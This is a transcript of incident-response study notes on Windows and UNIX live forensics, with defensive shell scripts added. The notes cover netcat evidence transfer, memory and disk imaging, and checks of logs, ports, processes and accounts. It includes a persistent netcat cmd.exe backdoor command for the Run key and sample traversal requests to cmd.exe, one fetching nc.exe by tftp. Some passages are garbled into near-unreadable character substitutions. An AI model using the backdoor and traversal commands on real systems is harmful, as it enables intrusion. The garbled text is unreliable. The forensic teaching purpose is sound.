Windows Live Response

Upload: shafeeque-olassery-kunnikkal

Post on 02-Jun-2018


TRANSCRIPT

8/10/2019 Windows Live Response

Chapter 1: Windows Live Response

Live Incident Response Process

Start a netcat server on the forensic workstation with the following command:

nc -v -l -p 2222 > command.txt

On the victim computer, run the command that collects the live response data and send its output to the forensic workstation with:

command | nc forensic_workstation_ip_address 2222

where forensic_workstation_ip_address is the IP address of the forensic workstation.

An MD5 checksum of command.txt can be calculated so that you can prove its integrity at a later date:

md5sum -b command.txt > command.md5

Always use the -b (binary) command-line switch so that the hash covers the file byte for byte and is not affected by text-mode line-ending translation. md5sum is available in the Cygwin utilities from http://www.cygwin.com/.

A variant of netcat named cryptcat (http://sourceforge.net/projects/cryptcat) should be used instead because it encrypts all of the data across the TCP channel. Because the data is encrypted, an intruder sniffing the network will not be able to see what you are collecting. Set your own key with -k on both ends; cryptcat's built-in default key is the same for everyone.

Analyzing Volatile Data

1) System Date and Time

The time and date are simply collected by issuing the time and date commands at the prompt. Use date /t and time /t on Windows 2000 and later so that the commands print the current value instead of prompting for a new one (a prompt hangs when the output is piped to netcat).

2) Current Network Connections

We view a machine's network connections by issuing the netstat command. We specify the -an flags with netstat to retrieve all of the network connections and the raw IP addresses instead of the Fully Qualified Domain Names (FQDN):

netstat -an


From the netstat output, identify what listens on each port: port 139 is the file sharing port (the NetBIOS session service runs on it); port 21 is the FTP port; the listener labelled NattyServer (EVIL) in the notes is the one that does not belong.

Use www.portsdb.org to find out what services normally run on a given port.

Ports above 1024 are typically ephemeral ports, so a listener up there with no known service behind it deserves a closer look.

3) Open TCP or UDP Ports and 4) Executables Opening TCP or UDP Ports

Use FPort to examine strange ports that are open on the machine and link them to the executables that opened them. It can be found at www.foundstone.com. (On Windows XP and later, netstat -ano also shows the owning process ID.)

Rename your netcat binary, for example to t_nc.exe, to symbolize that it is the trusted copy you brought with you rather than a binary found on the victim.

5) Cached NetBIOS Name Tables

Windows (up until version 2000


To learn which processes the attacker executed, use the pslist tool from the PsTools suite distributed from www.sysinternals.com.


The first several lines are usually system processes, recognizable by their lengthy elapsed running time. This is indicative of processes running since startup, which is typical of system processes; a recently started process with a short elapsed time stands out.

PsExec is a tool distributed from www.sysinternals.com that enables a valid user to connect from one Microsoft Windows machine to another and execute a command over a NetBIOS connection. Attackers typically use this tool to run cmd.exe. Finding it in the process list tells you three things. First, PsExec will only open a channel if you supply proper administrator-level credentials, therefore the attacker has an administrator-level password. Second, the attacker knows one of the passwords, and that password may work on other machines in the enterprise. Third, the attacker must be running a Microsoft Windows system on his attacking machine to execute PsExec.

One of the first things attackers usually do when they gain access to a system is to transfer their tools to the victim machine.

PsExec and PsFile will reveal the NetBIOS name of the computer that is attacking. Once you seize the attacker's computer, you may want to search for the NetBIOS name as a keyword on the attacker's computer.

12) Process Memory Dumps


We need to capture the memory space of the suspect processes. For details on the structure, organization, and management of memory on these operating systems, we recommend the excellent reference Inside Windows 2000, Third Edition by David Solomon and Mark Russinovich.


Microsoft provides a utility called userdump.exe for the Windows NT family of operating systems. This tool is a component of the Microsoft OEM Support Tools package, available under http://download.microsoft.com/download/win2000srv/Utility/

Map a share on the forensic workstation as a drive letter first, so that the dump is written there and not onto the victim's own disk:

net use B: \\forensic_workstation_ip_address\<share>


Sample output from userdump for the suspect process, showing the command line of the backdoor (-d detaches netcat from the console, -L makes it listen again after every connection, -n disables name resolution):

CommandLine: "nc -d -L -n -p <port>"


Dump physical memory, and then the first physical disk, with dd.exe from the trusted tools drive, writing the images onto the mapped drive:

D:\>dd.exe if=\\.\PhysicalMemory of=<drive>:\RWWW_full_memory_dump.dd bs=<block_size>

D:\>dd.exe if=\\.\PhysicalDrive0 of=<drive>:\RWWW_physicaldrive0.dd bs=<block_size>

Opening \\.\PhysicalMemory from user mode only works on Windows 2000, XP and Server 2003 before SP1; later versions block it and need a kernel-mode acquisition tool.


We can capture the complete registry in a rather cryptic format by using RegDmp without command-line options. We can see the key HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion with three subkeys: Run, RunOnce and RunOnceEx. Any values in Run signify programs that will be executed when the system starts up.

If you were the attacker, you could place the following command in the Run key to automatically open a backdoor at every boot (-d detaches netcat from the console, -L makes it listen again after each connection, and -e hands each connection to a command shell):

nc -d -L -p 10000 -e C:\winnt\system32\cmd.exe

    5* ,he &"ditin% Polic$


Windows NT and Windows 2000 do not have auditing turned on by default, therefore there are no security-related logs unless an administrator enabled them. The command to determine the auditing policy is auditpol. Auditpol is distributed with Microsoft's resource kits.

5) A History of Logins

A history of logins can be obtained with the NTLast command, distributed by www.foundstone.com. NTLast is run without command-line arguments to get all of the login information. It only has something to show if logon/logoff auditing was enabled beforehand, which is why it is very important to enable auditing.

6) System Event Logs

There are typically three types of event logs on a Windows machine:
- Security
- Application
- System

The command PsLogList within the PsTools suite distributed at www.sysinternals.com will extract these logs into an easy to read format.

Run: psloglist -s -x security


The -s switch tells psloglist to dump each event on a single line. The -x switch tells psloglist to dump the extended information for each event.

    :* 7ser &cco"nts

    5se pwd"mpwhich dumps the user accounts.

    6* II+ Lo%s

    "ou cannot block what you must allow in.

    The 00S -eb server writes any activity to logs in theC@AwinntAs$stem52Alo%/lesdirectory by default. To see what is inthe logs, t$pethem out.

    1irst, e!ecute this on the forensic workstation:

    nc v l p 2222 > ex=5=


A successful attack against a vulnerable server often crashes the Web server process, so the request that did the damage may never be written to the IIS log; what was logged just before the gap is still valuable. The Web server should never execute the cmd.exe command shell, so any request for cmd.exe in the log is evidence of an attack.
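The check described above, written as an added example that is not part of the original notes: a scanner for an IIS W3C extended log that flags every request reaching cmd.exe or carrying an encoded "../" traversal. The log lines are constructed for this example; the field names come from the standard "#Fields:" header IIS writes, which the parser reads so that column positions are not hard-coded. The function names are this example's own.

```shell
# Constructed sample log in IIS W3C extended format (not a real capture).
SAMPLE_IIS_LOG=$(cat <<'EOF'
#Software: Microsoft Internet Information Services 5.0
#Version: 1.0
#Date: 2003-10-01 13:01:42
#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
2003-10-01 13:01:42 192.168.1.9 GET /default.htm - 200
2003-10-01 13:02:10 192.168.1.9 GET /scripts/..%c0%af../winnt/system32/cmd.exe /c+dir+c:\ 200
2003-10-01 13:02:31 192.168.1.9 GET /scripts/..%255c../winnt/system32/cmd.exe /c+tftp+-i+10.0.0.1+GET+nc.exe 502
2003-10-01 13:05:00 10.1.1.3 GET /images/logo.gif - 304
EOF
)

# Read a W3C log on stdin; print "client-ip uri-stem uri-query status"
# for each request that touches cmd.exe or uses an encoded traversal
# (%c0%af and %c1%9c are the Unicode "/" and "\" forms, %255c and %%35c
# the double-decode forms).
scan_iis_log() {
    awk '
    /^#Fields:/ { for (i = 2; i <= NF; i++) col[$i] = i - 1; next }  # field name -> data column
    /^#/ { next }                                                    # other header lines
    {
        ip = col["c-ip"]; stem = col["cs-uri-stem"]; q = col["cs-uri-query"]; st = col["sc-status"]
        req = tolower($stem "?" $q)
        if (req ~ /cmd\.exe/ || req ~ /%c0%af|%c1%9c|%255c|%%35c|%2e%2e|\.\.\//)
            print $ip, $stem, $q, $st
    }'
}

# Distinct source addresses of the hits: the hosts to look for in the
# firewall logs and on the other servers in the enterprise.
iis_attacker_ips() {
    scan_iis_log | awk '{ print $1 }' | sort -u
}
```

Run it as `type exYYMMDD.log | nc ...` on the victim and `nc -l -p 2222 | scan_iis_log` on the workstation, or over the transferred file with `scan_iis_log < exYYMMDD.log`; the 502 on the second hit is the kind of gap the paragraph above describes, the request arrived but the process handling it did not live to log a normal status.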

    ;* +"spicio"s 4iles

    To transfer any suspicious 3le , run the following on the forensicworkstation:

    -c v l p 2222 > $lename

    Then, transfer the 3le named $lenameby using t$pe:

    t$pe $lename| nc forensic8worstation8ip8address 2222

    P"ttin% It &ll ,o%ether

    [email protected]%readin%8roomwhitepapersthreats"nicodeGv"lnera#ilit$Gwh$8!;

Chapter 2: UNIX Live Response

On the forensic workstation, run:

nc -v -l -p 10000 > command.txt

On the victim computer, run:

command | nc forensic_workstation_ip_address 10000

Remember to press CTRL-C to break the netcat session once the output has been transferred.

Run: md5sum -b command.txt > command.md5

    1* +$stem )ate and ,ime

    un:)ate

    2* C"rrent -etwor Connections

    un:netstat an


Port 515 is the port on which the printer daemon (lpd) typically listens. Doing a quick search on www.securityfocus.com for Red Hat Linux and the printer daemon (lpd), you see that this is a vulnerable TCP port.

3) Open TCP or UDP Ports

Run the following to see the process number that opened each port. The -p option only works on Linux and will not work on other flavors of UNIX:

netstat -anp

The UNIX version of FPort is lsof, for "List Open Files". lsof is the single most powerful tool in the Live Response toolkit for Unix systems.

Run: lsof -n
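Triage of the netstat output, as an added example that is not part of the original notes and serves both the Windows netstat -an / FPort step of Chapter 1 and the netstat -anp step here: it links each listening port to its program and flags the ones that do not belong. The sample output is constructed in the format Linux netstat -anp prints (Windows netstat -an has no PID column, which is why the notes reach for FPort), and the EXPECTED_SERVICES allow-list is an assumption about what the administrator knows should be listening.

```shell
# Added example: pick the odd listeners and the live peers out of "netstat -anp".
EXPECTED_SERVICES="sshd lpd syslogd"   # assumption: the host's known-good daemons

# Constructed sample in Linux "netstat -anp" format (not a real capture).
SAMPLE_NETSTAT=$(cat <<'EOF'
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      612/sshd
tcp        0      0 0.0.0.0:515             0.0.0.0:*               LISTEN      701/lpd
tcp        0      0 0.0.0.0:10000           0.0.0.0:*               LISTEN      1843/nc
tcp        0      0 192.168.1.5:22          192.168.1.9:41231       ESTABLISHED 2101/sshd
tcp        0      0 192.168.1.5:10000       192.168.1.9:41250       ESTABLISHED 1843/nc
udp        0      0 0.0.0.0:514             0.0.0.0:*                           598/syslogd
EOF
)

# Print "PORT PID/PROGRAM REASON" for every listening TCP socket whose
# program is not on the allow-list, or that sits above the well-known
# range (the notes' rule that ports above 1024 are normally ephemeral).
suspicious_listeners() {
    awk -v ok="$EXPECTED_SERVICES" '
    BEGIN { n = split(ok, a, " "); for (i = 1; i <= n; i++) known[a[i]] = 1 }
    $1 == "tcp" && $6 == "LISTEN" {
        port = $4; sub(/.*:/, "", port)       # strip the host part; also handles IPv6 ":::22"
        prog = $7; sub(/.*\//, "", prog)      # "1843/nc" -> "nc"; "-" when netstat lacked privilege
        if (!(prog in known))      print port, $7, "unknown-program"
        else if (port + 0 > 1024) print port, $7, "high-port"
    }'
}

# Print "REMOTE LOCAL PID/PROGRAM" for every established TCP session:
# the remote address is where the attacker is sitting right now.
established_peers() {
    awk '$1 == "tcp" && $6 == "ESTABLISHED" { print $5, $4, $7 }'
}
```

Feed it the live output with `netstat -anp | suspicious_listeners`; a program name of "-" means netstat could not see the owner, which on a live box is itself worth noting, and the established_peers list is what you carry over to the firewall logs.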


A good source on loaded kernel modules is the book Malware: Fighting Malicious Code by Ed Skoudis. A kernel-mode rootkit can hide its module from lsmod and its processes from ps, so disagreement between these listings and the network or file evidence is itself a finding.

5) Running Processes

Run the following to see a list of all the running processes on the system and the users running them:

ps aux

6) Open Files

Run: lsof

7) The Internal Routing Table

Run: netstat -rn

8) Loaded Kernel Modules

Run: lsmod

9) Mounted File Systems


    un:mo"nt or df

    &nal$'in% -onvolatile )ata

    1* +$stem (ersion and Patch Level

    un to get all the available operating system version information:"name a

    un to get package and version number:rpm a


2) File System Time and Date Stamps

Run:

find / -printf "%m;%Ax;%AT;%Tx;%TT;%Cx;%CT;%U;%G;%s;%p\n"

This prints, for every file, its mode, access date and time, modification date and time, inode change date and time, owner UID, group GID, size and path, semicolon separated so the output can be sorted and loaded into a spreadsheet. (-printf is a GNU find option.)

3) File System MD5 Checksum Values

Databases of known hashes of known system files are available at www.hashkeeper.org.

To calculate the MD5 checksum for every file on the system without crossing into other mounted file systems, run:

find / -type f -xdev -exec md5sum -b {} \;

4) Users Currently Logged On

Users who are currently logged on are recorded in the /var/run/utmp log.

Run: w

Attackers who want to seriously hamper your investigation can use zap2, a utmp/wtmp log cleaner publicly available from www.packetstormsecurity.com, to erase their own login entries.

5) A History of Logins
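The two find one-liners above turned into a repeatable baseline-and-compare, as an added example that is not part of the original notes. The function names and the CHANGED/MISSING/NEW labels are this example's own; the hash set can be one you took earlier or a known-good set in the same "hash *path" format. Paths containing spaces are not handled, and -printf with %T@ requires GNU find.

```shell
# Added example: hash baseline, comparison, and a sortable MAC-time listing.

# Hash every regular file under ROOT without crossing into other mounted
# file systems, sorted by path so two runs can be compared line by line.
baseline_hashes() {
    find "$1" -xdev -type f -exec md5sum -b {} \; | sort -k2
}

# Compare a saved baseline (first argument, must be non-empty) against the
# live tree (second argument).  Prints one line per difference:
# CHANGED, MISSING or NEW followed by the path.
compare_baseline() {
    baseline="$1"; root="$2"
    current=$(mktemp)
    baseline_hashes "$root" > "$current"
    awk 'NR == FNR { base[$2] = $1; next }     # first file: the baseline
         { cur[$2] = $1 }                       # second file: the live hashes
         END {
             for (p in base) if (!(p in cur)) print "MISSING", substr(p, 2)   # substr drops md5sum -b "*" marker
             for (p in cur) {
                 if (!(p in base))           print "NEW", substr(p, 2)
                 else if (cur[p] != base[p]) print "CHANGED", substr(p, 2)
             }
         }' "$baseline" "$current" | sort
    rm -f "$current"
}

# MAC timeline: modification, access and inode-change times as epoch
# seconds, then mode, owner, group, size and path, oldest modification first.
mac_timeline() {
    find "$1" -xdev -printf '%T@;%A@;%C@;%m;%U;%G;%s;%p\n' | sort -t ';' -k1,1n
}
```

Take the baseline with `baseline_hashes / > /mnt/forensic/root.md5` onto the forensic share, never onto the victim's disk, and later run `compare_baseline /mnt/forensic/root.md5 /`; the epoch-second timeline sorts correctly, which the locale-formatted %Ax/%Tx dates in the notes' version do not.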


A history of logins is saved in the /var/log/wtmp binary log.

Run: last

Datapipe is a utility that will listen on one port and forward the traffic to another port on another machine; attackers use it to relay their connections through a compromised host so that the victim only ever sees the relay's address.

6) Syslog Logs

The syslog daemon listens for messages from either local programs or other hosts on the network and logs them according to the /etc/syslog.conf configuration file.

The two logs most relevant to an investigation are /var/log/messages and /var/log/secure. The fifth field of each line is the message that was logged. When buffer overflows occur, they break valid programs. When programs break, garbage (non-printable bytes, long runs of padding characters) is typically generated in the log.


    6* 7ser &cco"nts

    >!amine etcpasswdto see whether the intruder has added anyrogue user accounts

    A rogue account can have a root directory of ' and more importantly auser 0D of ;ero.
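The /etc/passwd checks above as a script, added here as an example that is not part of the original notes and going one step further than the text: besides UID 0 and a home directory of /, it reports duplicate UIDs and diffs the current file against a trusted earlier copy. The passwd contents are constructed for this example; the labels and function names are this example's own.

```shell
# Added example: audit /etc/passwd for rogue accounts.

# Constructed sample passwd (not from a real system).
SAMPLE_PASSWD=$(cat <<'EOF'
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
apache:x:48:48:Apache:/var/www:/sbin/nologin
jdoe:x:500:500:John Doe:/home/jdoe:/bin/bash
toor:x:0:0::/:/bin/sh
sshd2:x:501:501::/:/bin/bash
EOF
)

# Read passwd on stdin.  Flag accounts that are root in all but name
# (UID 0), that have / as their home directory, or that share a UID with
# an earlier entry (a second UID 0 always shows up here as well).
audit_passwd() {
    awk -F: '
    $3 == 0 && $1 != "root" { print "UID0", $1 }
    $6 == "/"               { print "HOMEDIR-ROOT", $1 }
    {
        if ($3 in seen) print "DUP-UID", $1, "shares uid", $3, "with", seen[$3]
        else seen[$3] = $1
    }'
}

# Usernames present in the current passwd (second argument) that are
# absent from a trusted copy (first argument), e.g. the last backup.
new_accounts() {
    awk -F: 'NR == FNR { seen[$1] = 1; next } !($1 in seen) { print $1 }' "$1" "$2"
}
```

Run `audit_passwd < /etc/passwd` on the transferred copy, not on the victim; and remember that a rogue account can also be added to /etc/shadow alone or given a password in a pre-existing locked entry, so compare shadow against its backup too.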

8) User History Files

Go to ~username/.bash_history to see files that may contain commands that failed, or that reveal what the intruder was looking for. For example, ps auxw | grep datapipe shows the intruder looking for the keyword datapipe.

To transfer a history file (or any other suspicious file) to the forensic workstation, first listen there:

nc -v -l -p 10000 > filename

Then, on the victim, transfer the file named filename:

cat filename | nc forensic_workstation_ip_address 10000


By entering the /proc directory you can see references to running processes and other system information. You see directories named after integers, one per process ID, such as 6
